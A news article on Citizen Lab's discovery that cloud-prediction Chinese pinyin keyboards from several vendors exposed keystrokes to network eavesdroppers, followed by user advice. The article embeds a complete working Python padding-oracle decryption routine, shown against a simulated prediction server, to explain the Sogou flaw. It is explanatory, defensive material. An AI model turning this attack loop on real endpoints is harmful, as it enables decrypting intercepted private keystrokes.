Researchers have uncovered serious vulnerabilities in cloud-based keyboard apps used to type Chinese characters with the pinyin input method.
The flaws could expose the keystrokes of up to a billion users to anyone able to watch the network traffic between the keyboard and the vendor's servers.
The Citizen Lab, based in Toronto, Canada, recently published a study on apps created by nine manufacturers: Baidu, Honor, Huawei, iFlytek, OPPO, Samsung, Tencent, Vivo, and Xiaomi.
Examining apps and devices sold in China, the researchers found that eight of the nine vendors shipped keyboards whose keystroke traffic could be recovered by a network eavesdropper, potentially exposing over a billion users.
The common weak point is cloud-based prediction, the feature these apps advertise as making Chinese typing faster: as the user types, the pinyin is sent to the vendor's servers, which return candidate characters.
That design means every keystroke leaves the device, so if the transport encryption is flawed, whoever sits on the network path between the phone and the server can intercept and recover what was typed.
The research team reported the security holes to the nine vendors. Most responded and shipped fixes, but a few keyboard apps remained vulnerable at the time of publication.
This was not Citizen Lab's first finding in this area: in August of last year it reported cryptographic vulnerabilities in Tencent's Sogou Input Method that allowed network eavesdroppers to decrypt users' keystrokes.
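The core of both Citizen Lab findings is that the prediction traffic was protected by vendor-written encryption rather than standard TLS, and the Sogou analysis specifically traced the break to a CBC padding oracle in the app's transport encryption. The Python below, written for this article and not code from Citizen Lab, Tencent or any other vendor, shows why such an oracle is fatal: a hypothetical prediction server (`PredictionServer`) decrypts each request and reports only whether the padding was well-formed, and `padding_oracle_decrypt` recovers a captured request byte by byte from that yes/no answer alone, never seeing the key. The block cipher is a toy Feistel construction over HMAC-SHA256 so the example runs on the standard library; the attack does not touch the cipher, so AES-CBC behaves identically. The request body `pinyin=nihao&ctx=mima` is a constructed sample, not the real wire format.

```python
import hashlib, hmac, os

BLOCK = 16

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, i: int, half: bytes) -> bytes:
    # Feistel round function: keyed hash of (round number, half block), cut to 8 bytes.
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    # Toy 16-byte block cipher (4-round Feistel) constructed for this demo; the attack
    # below never exploits the cipher itself, so AES in CBC mode falls the same way.
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, xor(l, _round(key, i, r))
    return l + r

def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _round(key, i, l)), l
    return l + r

def pad(data: bytes) -> bytes:  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        out += xor(block_decrypt(key, ciphertext[i:i + BLOCK]), prev)
        prev = ciphertext[i:i + BLOCK]
    return out

class PredictionServer:
    # Hypothetical stand-in for a vendor's cloud-prediction endpoint. It holds the key and
    # reveals only whether a request decrypted to well-formed padding: the padding oracle.
    def __init__(self, key: bytes) -> None:
        self._key, self.queries = key, 0

    def accepts(self, iv: bytes, ciphertext: bytes) -> bool:
        self.queries += 1
        try:
            unpad(cbc_decrypt(self._key, iv, ciphertext))
            return True
        except ValueError:
            return False

def padding_oracle_decrypt(oracle, iv: bytes, ciphertext: bytes) -> bytes:
    # Recover a captured CBC message with nothing but the oracle: no key, no cipher weakness.
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    recovered = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # block_decrypt(key, target), learned one byte at a time
        for pos in range(BLOCK - 1, -1, -1):
            padval = BLOCK - pos
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):  # known bytes: make them decrypt to padval
                forged[j] = inter[j] ^ padval
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged), target):
                    continue
                if pos == BLOCK - 1:
                    # 0x01 validates, but so would 0x02 0x02 by chance. Disturb the byte
                    # before it; only a genuine 0x01 padding still validates afterwards.
                    check = bytearray(forged)
                    check[pos - 1] ^= 0xFF
                    if not oracle(bytes(check), target):
                        continue
                inter[pos] = guess ^ padval
                break
            else:
                raise RuntimeError("no guess accepted: the endpoint is not a padding oracle")
        recovered += xor(inter, prev)
    return unpad(recovered)

def demo() -> tuple:
    # Constructed sample request body (the real wire format is not on the page).
    keystrokes = b"pinyin=nihao&ctx=mima"
    key, iv = os.urandom(16), os.urandom(16)  # the eavesdropper never learns the key
    on_the_wire = cbc_encrypt(key, iv, pad(keystrokes))
    server = PredictionServer(key)
    recovered = padding_oracle_decrypt(server.accepts, iv, on_the_wire)
    return recovered, server.queries
```

Calling `demo()` returns the recovered request together with the number of oracle queries it took, a few thousand for two blocks. Real oracles are rarely a clean boolean; they show up as a distinct error code, a different response length, or a timing difference, but the recovery loop is the same. The fix that holds up is not a stronger cipher but authenticated encryption, in practice standard TLS, so that a tampered ciphertext is rejected before any padding is ever examined.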
So what should users do?
Anyone using QQ Pinyin, or a phone that came with a vulnerable pre-installed keyboard, should switch keyboards now.
Users of the Sogou, Baidu, or iFlytek keyboard apps should make sure both the app and the device's operating system are fully updated.
Users of Baidu IME should go further and either switch to another keyboard app or disable cloud-based input in its settings.
Treat your keystrokes as sensitive: passwords, messages and addresses all pass through the keyboard, and none of it should be readable by a third party on the network.
Stay alert and protect your privacy.
The primary risk involves the potential exposure of keystrokes to unauthorized parties due to cloud-based prediction features that transmit typed data to remote servers.
The study identified apps from major manufacturers including Baidu, Honor, Huawei, and Xiaomi among others, with Tencent’s Sogou Input Method specifically noted for cryptographic vulnerabilities.
Most manufacturers have addressed the reported vulnerabilities by making necessary security improvements, although some apps still remain at risk.
Users should update their keyboard apps and device operating systems right away, or switch to a keyboard that has been fixed, particularly if they use Baidu IME or Sogou.
Beyond updating or switching, disabling cloud-based input removes the network exposure entirely, and any app that handles sensitive input deserves a look at its security settings.